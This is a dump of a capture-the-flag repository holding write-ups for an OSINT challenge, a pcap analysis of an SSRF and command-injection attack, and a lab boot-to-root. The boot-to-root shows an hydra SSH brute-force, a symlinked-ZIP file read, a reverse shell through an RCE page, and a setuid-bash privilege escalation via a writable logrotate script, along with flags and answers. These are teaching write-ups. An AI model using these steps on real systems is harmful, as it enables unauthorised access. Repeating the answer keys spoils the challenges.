Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/README.md: -------------------------------------------------------------------------------- 1 | ## #exec cmd="whoami" 2 | 3 | ### Task 4 | 5 | Analyze the picture and answer the questions. 6 | 7 | ![OSINT Picture](images/figure-1.png) 8 | 9 | **Question 1.** Who is the owner of this picture? 10 | 11 | **Question 2.** What is the email address of him? 12 | 13 | **Question 3.** Which country is he living in? 14 | 15 | **Question 4.** Find the flag. 16 | 17 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/Writeup.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | **Question 1.** Who is the owner of this picture? 4 | 5 | To find out this information, extracting the exif data of this picture is enough: 6 | 7 | ![alt text](images/figure-2.png) 8 | 9 | **ANSWER**: **Marko Ivan Marojević** 10 | 11 | --- 12 | 13 | **Question 2.** What is the email address of him? 14 | 15 | By analyzing the picture attentively, the GitHub logo can be easily noticed. So we have to search for Marko Ivan in the GitHub. 16 | 17 | Searching for **Marko Ivan Marojević** in the GitHub: 18 | 19 | ![alt text](images/figure-3.png) 20 | 21 | GitHub profile of Marko Ivan: 22 | 23 | ![alt text](images/figure-4.png) 24 | 25 | In the greeting page, we can easily collect information such as where he is studying, where he is working, how to contact him. 26 | 27 | **ANSWER**: **ivan.marojevic@prvabankacg.com** 28 | 29 | --- 30 | 31 | **Question 3.** Which country is he living in? 32 | 33 | We can see that Marko is an intern at “Prva banka Crne Gore AD”, in Podgorica. Podgorica is the capital city of Montenegro. 34 | 35 | **ANSWER**: **Montenegro** 36 | 37 | --- 38 | 39 | **Question 4.** Find the flag. 40 | 41 | There is a repository in Marko’s profile: 42 | 43 | ![alt text](images/figure-5.png) 44 | 45 | And the note left in the main page of Marko is this: 46 | 47 | ![alt text](images/figure-6.png) 48 | 49 | ***Sometimes it is good to retrospect…*** It means that we should look into something history-related. 50 | 51 | ***Maybe a commit history?*** 52 | 53 | ![alt text](images/figure-7.png) 54 | 55 | Clicking on the **Commits** link gives us the commit history: 56 | 57 | ![alt text](images/figure-8.png) 58 | 59 | The Base64-encoded value: 60 | 61 | ![alt text](images/figure-9.png) 62 | 63 | **ANSWER**: **`ICSD_2024{J7aLn3XkQ9aB2vV8iRdK}`** 64 | 65 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/README.md: -------------------------------------------------------------------------------- 1 | # Packet Detective 2 | 3 | In the .pcap file given to you, an attack path of a malicious user has been captured. Analyze it and answer the questions. 4 | 5 | **Question 1.** How many ICMP Echo requests were sent to the target initially? 6 | 7 | **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in the ascending order***) 8 | 9 | **Question 3.** Which port was open? 10 | 11 | **Question 4.** Which football club’s website was hosted on that port? 12 | 13 | **Question 5.** Which port did the attacker host an HTTP server? 14 | 15 | **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***) 16 | 17 | **Question 7.** Which port hosted an internal application? 18 | 19 | **Question 8.** What is the name of the file containing sensitive information? 20 | 21 | **Question 9**. What is the password? -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/Writeup.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | - **Question 1.** How many ICMP Echo requests were sent to the target initially? 4 | - Filter: **`icmp && ip.src == 192.168.149.131`** 5 | 6 | ![alt text](images/figure-1.png) 7 | 8 | - ANSWER: **`10`** 9 | 10 | --- 11 | 12 | - **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in the ascending order***) 13 | - Packets number from **27** to **37** is an indicator of a port scan. 14 | 15 | ![alt text](images/figure-2.png) 16 | 17 | - According to the packets with SYN flag sent by source IP address, 192.168.149.131, we can determine which ports were scanned. 18 | 19 | - ANSWER: **`22,80,4000,5000,8080`** 20 | 21 | --- 22 | 23 | - **Question 3.** Which port was open? 24 | - As seen from the port scan capture, port **`4000`** responded with a packet of **`[SYN,ACK]`** flag. The attacker host then sent a TCP packet with a **`RST`** flag and terminates the connection, because it determined that it was open. 25 | 26 | - ANSWER: **`4000`** 27 | 28 | --- 29 | 30 | - **Question 4.** Which football club’s website was hosted on that port? 31 | - Following HTTP stream from packet number 61 is enough to determine: 32 | 33 | ![alt text](images/figure-3.png) 34 | 35 | - ANSWER: **`Qarabagh`** 36 | 37 | --- 38 | 39 | - **Question 5.** Which port did the attacker host an HTTP server? 40 | - The packet number 105 shows us the request made to the attacker’s HTTP server, which was hosted on port 8888. 41 | 42 | ![alt text](images/figure-4.png) 43 | 44 | - ANSWER: **`8888`** 45 | 46 | --- 47 | 48 | - **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***) 49 | - The attacker tried to fetch unauthorized resources by making the requests on behalf of the server, meaning that they tried to conduct a **Server-Side Request Forgery** attack. 50 | 51 | - ANSWER: **`Server-Side Request Forgery`** 52 | 53 | --- 54 | 55 | - **Question 7.** Which port hosted an internal application? 56 | - The request made to the port **4455** of the localhost was successful: 57 | 58 | ![alt text](images/figure-5.png) 59 | 60 | - ANSWER: **`4455`** 61 | 62 | --- 63 | 64 | - **Question 8.** What is the name of the file containing sensitive information? 65 | - The attacker made a request by exploiting a command injection vulnerability in the internal application to read the contents of the file called **`github-pass`**: 66 | 67 | ![alt text](images/figure-6.png) 68 | 69 | - ANSWER: **`github-pass`** 70 | 71 | --- 72 | 73 | - **Question 9**. What is the password? 74 | - Following the HTTP stream for packet number 2051: 75 | 76 | ![alt text](images/figure-7.png) 77 | 78 | - ANSWER: **`Mar0j3vic_2024!$`** -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Exorcising Sukuna’s Curse 3 | 4 | *The network has been cursed by Sukuna’s influence. As a jujutsu sorcerer, you must help Yuta track down the cursed flags hidden within the system, each like one of Sukuna’s fingers. Uncover the full extent of the breach and aid Yuta in defeating the King of Curses before the network falls. Can you exorcise Sukuna’s curse in time?* 5 | 6 | ![image.png](images/imagee.png) -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/Writeup.md: -------------------------------------------------------------------------------- 1 | 2 | ### **Exorcising Sukuna’s Curse** 3 | 4 | ![photo_5451743980887859735_x.jpg](images/image%2001.jpg) 5 | 6 | --- 7 | 8 | ## CONNECTION 9 | 10 | Let’s start the machine and connect with OpenVPN. 11 | 12 | ```bash 13 | sudo openvpn prolab-user_1.ovpn 14 | ``` 15 | 16 | ![image.png](images/image%2002.png) 17 | 18 | 19 | --- 20 | 21 | ## ENUMERATION 22 | 23 | - NMAP SCAN 24 | 25 | ```bash 26 | nmap -sC -sV -p- --min-rate 5000 10.20.17.70 27 | ``` 28 | 29 | ![image.png](images/image.png) 30 | 31 | An initial Nmap scan reveals two open ports. On port 21 `FTP`, and on port 22 `SSH` service is running. The Nmap script result indicates that Anonymous login for FTP is allowed. Now, we can continue enumeration process with FTP. 32 | 33 | - FTP LOGIN 34 | 35 | ```bash 36 | ftp 10.20.17.70 37 | ``` 38 | 39 | ![image.png](images/image%201.png) 40 | 41 | Only one .txt file exists on FTP server (system_log.txt). In order to read it, firstly, we exchange to `binary` mode and download the file to our machine with `get` command. 42 | 43 | ```bash 44 | ftp> binary 45 | ftp> get system_log.txt 46 | ftp> exit 47 | ``` 48 | 49 | ![image.png](images/image%202.png) 50 | 51 | We’ve received a hint from the file: the probable username is 'user1', and the SSH service, since it’s open, will be a target for a potential brute-force attack. We can move on to the next stage. 52 | 53 | --- 54 | 55 | ## EXPLOITATION & INITIAL FOOTHOLD 56 | 57 | - SSH BRUTE-FORCE 58 | 59 | ```bash 60 | hydra -l user1 -P rockyou.txt 10.20.17.70 ssh 61 | ``` 62 | 63 | ![image.png](images/image%203.png) 64 | 65 | Soon, we successfully cracked the user's password and gained an initial foothold on the machine using SSH credentials. 66 | 67 | ![image.png](images/image%2003.png) 68 | 69 | --- 70 | 71 | ## PRIVILEGE ESCALATION ( HORIZONTAL ) 72 | 73 | The first flag we should get is located on `/home/user2/user.txt.` 74 | 75 | That is a user on the machine to which we need to escalate our privileges. 76 | 77 | ```bash 78 | cat /etc/passwd 79 | ``` 80 | 81 | ![image.png](images/image%204.png) 82 | 83 | Besides user2, the presence of another user `www-data` shows that a web application is likely running on the machine. 84 | 85 | We will view running processes in order to determine the listening port for web server and /var/www/html folder to know the exact location for web application. 86 | 87 | ```bash 88 | netstat -tulpn 89 | ``` 90 | 91 | ![image.png](images/image%2004.png) 92 | 93 | We don’t have permission for webapp folder. Port 9090 is commonly used as an alternative HTTP port for web servers. It is running on local machine: `127.0.0.1:9090`. That’s why we can’t access it from our machine. To achieve this, we need to set up port forwarding. 94 | 95 | ```bash 96 | ssh -L 127.0.0.1:4444:127.0.0.1:9090 user1@10.20.17.70 97 | ``` 98 | 99 | ![image.png](images/image%205.png) 100 | 101 | Explaining the commands: 102 | 103 | - `ssh -L` - used in local ssh port forwarding. 104 | - `127.0.0.1:4444` - is our local machine ip and port (port is optional). 105 | - `127.0.0.1:9090` - is remote machine ip and port in which web server is running. 106 | - `user1@10.20.17.70` - needed ssh credentials to connect. 107 | 108 | Once the set up is complete, we can open a web browser and access the web server at `http://127.0.0.1:4444` . 109 | 110 | ![image.png](images/image%206.png) 111 | 112 | It appears that the Apache web server is running on the machine, with directory listing enabled. Let’s take a closer look at the script files. 113 | 114 | ![image.png](images/image%207.png) 115 | 116 | `/uploads` 117 | 118 | Directory is empty. 119 | 120 | ![image.png](images/image%208.png) 121 | 122 | `upload.php` 123 | 124 | Another hint suggests that we should look into the source code of upload.php. However, it currently does not reveal any useful information. 125 | 126 | ![image.png](images/image%209.png) 127 | 128 | ![image.png](images/image%2010.png) 129 | 130 | `doc.php` 131 | 132 | This php script is intended to upload files to the remote machine. Let’s take advantage of it. 133 | 134 | We aim to understand the functionality of the script, that is why we upload a random file and observe that it only accepts ZIP files. 135 | 136 | ![image.png](images/image%2011.png) 137 | 138 | ![image.png](images/image%2012.png) 139 | 140 | There are many ways to exploit vulnerabilities with ZIP files, but our goal is to examine `upload.php`. Therefore, we will use a symlink to access the contents of the file. 141 | 142 | - Create and store symlinks in ZIP files: 143 | 144 | ```bash 145 | ln -s /var/www/html/webapp/upload.php zipfile #Make symlink to the exact location of upload.php. 146 | zip -y zipfile.zip zipfile #Create symlinked ZIP file. 147 | ``` 148 | 149 | ![ctf2.png](images/ctf2.png) 150 | 151 | ![image.png](images/image%2013.png) 152 | 153 | ![image.png](images/image%2014.png) 154 | 155 | ![image.png](images/image%2015.png) 156 | 157 | A folder is created for ZIP file and uploaded to the `/uploads` directory. 158 | 159 | ![image.png](images/image%2016.png) 160 | 161 | ![image.png](images/image%2017.png) 162 | 163 | The symlink was extracted from the ZIP file, and upon clicking it, we can now view the source code of `upload.php` 164 | 165 | ![image.png](images/image%2018.png) 166 | 167 | The script contains a message directing us to access the `/.pro_hidden_connectivity` folder. 168 | 169 | ![image.png](images/image%2019.png) 170 | 171 | ![image.png](images/image%2020.png) 172 | 173 | Here is another php script, named `rce.php` is for the Remote Code Execution. 174 | 175 | ![image.png](images/image%2021.png) 176 | 177 | ![image.png](images/image%2022.png) 178 | 179 | Before we proceed, we should initiate a netcat listener. 180 | 181 | ![image.png](images/image%2023.png) 182 | 183 | We have entered a suitable one-liner command for a reverse shell. 184 | 185 | ![image.png](images/image%2005.png) 186 | 187 | ![image.png](images/image%2024.png) 188 | 189 | It results in an error during code execution. 190 | The reason for this is clearly indicated in the script: `window.btoa`, which is used to encode a string in Base64 format. 191 | 192 | ![image.png](images/image%2025.png) 193 | 194 | Let’s encode the command to base64 format and execute it again. As a result, we have got a reverse shell from user2 and received our first flag. 195 | 196 | ![image.png](images/image%2026.png) 197 | 198 | ![image.png](images/image%2027.png) 199 | 200 | 201 | 202 | ![image.png](images/image%2028.png) 203 | 204 | --- 205 | 206 | # PRIVILEGE ESCALATION (ROOT) 207 | 208 | After having the shell from “user2”, now run the `linpeas.sh` for finding potential privilege escalation. 209 | 210 | Then we found logrotate in `/etc/cron.d`: 211 | 212 | ![image.png](images/image%2029.png) 213 | 214 | Additionally, there is a writable path for escalation that `linpeas.sh` shows. 215 | 216 | ![image.png](images/image%2030.png) 217 | 218 | When we look at the logrotate configuration files, we found an interesting configuration file called as “blackmirror”. 219 | 220 | ![image.png](images/image%2031.png) 221 | 222 | After reading this configuration file, we realized the file path is vulnerable : 223 | 224 | ```bash 225 | /usr/local/bin/postrotate.sh 226 | ``` 227 | 228 | ![image.png](images/image%2032.png) 229 | 230 | Since `postrotate.sh` is writable by all users (due to `777` permissions), we modify it to include a command that will allow privilege escalation. Here’s how: 231 | 232 | - Overwrite `postrotate.sh` with a payload that creates a setuid shell: 233 | 234 | Explanation of malicious script: 235 | 236 | - `#!/bin/bash`: Specifies that the script should run with Bash. 237 | - `cp /bin/bash /tmp/bash`: Copies the system’s `bash` executable to `/tmp`. 238 | - `chmod +s /tmp/bash`: Sets the setuid permission, allowing the shell to execute with the privileges of the file owner (root). 239 | 240 | Now we are root!!! 241 | 242 | ![image.png](images/image%2033.png) -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am 